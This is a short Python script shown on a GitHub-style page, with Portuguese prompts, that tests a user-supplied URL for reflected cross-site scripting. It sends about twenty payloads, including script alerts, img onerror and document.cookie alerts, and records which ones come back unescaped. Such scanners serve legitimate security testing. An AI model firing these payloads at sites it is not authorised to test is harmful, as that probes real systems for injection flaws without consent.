-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathxss_analysis.py
48 lines (42 loc) · 1.93 KB
/
xss_analysis.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
import requests
from utils import save_results
def test_xss():
url = input("Digite a URL para teste de XSS: ")
xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"'\"><script>alert('XSS')</script>",
"<script>alert(document.cookie)</script>",
"<script>document.write('<img src=x onerror=alert('XSS')>')</script>",
"<script>prompt(document.cookie)</script>",
"<script>confirm(document.cookie)</script>",
"<script>console.log(document.cookie)</script>",
"<script>console.log('XSS')</script>",
"<script>console.warn('XSS')</script>",
"<script>console.error('XSS')</script>",
"<script>console.info('XSS')</script>",
"<script>console.debug('XSS')</script>",
"<script>console.trace('XSS')</script>",
"<script>console.dir('XSS')</script>",
"<script>console.dirxml('XSS')</script>",
"<script>console.group('XSS')</script>",
"<script>console.groupEnd('XSS')</script>",
"<script>console.table('XSS')</script>",
"<script>console.count('XSS')</script>"
]
results = []
for payload in xss_payloads:
try:
response = requests.get(url + payload, timeout=5)
if payload in response.text:
results.append({"payload": payload, "vulnerable": True})
print(f"Vulnerabilidade XSS encontrada com payload: {payload}")
else:
results.append({"payload": payload, "vulnerable": False})
except requests.exceptions.RequestException as e:
print(f"Erro ao testar payload '{payload}': {e}")
save = input("Deseja salvar os resultados? (s/n): ")
if save.lower() == 's':
sanitized_url = url.replace('http://', '').replace('https://', '').replace('/', '_')
save_results(results, "xss_results", f"xss_test_{sanitized_url}.json")
print("Resultados salvos.")